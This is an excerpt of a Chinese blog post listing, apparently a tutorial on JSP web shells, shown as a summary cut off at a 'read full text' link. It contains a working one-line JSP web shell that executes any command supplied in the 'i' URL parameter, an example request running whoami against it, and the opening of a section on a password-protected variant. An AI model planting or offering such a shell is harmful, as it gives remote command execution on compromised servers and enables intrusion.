摘要: #一、无回显的命令执行(命令执行后不会在前端页面返回数据) <%Runtime.getRuntime().exec(request.getParameter("i"));%> ###请求url:http://127.0.0.1/shell.jsp?i=whoami #二、有回显带密码的命令执行(命令 阅读全文
posted @ 2021-02-05 21:49 亨利其实很坏 阅读(1678) 评论(0) 推荐(0)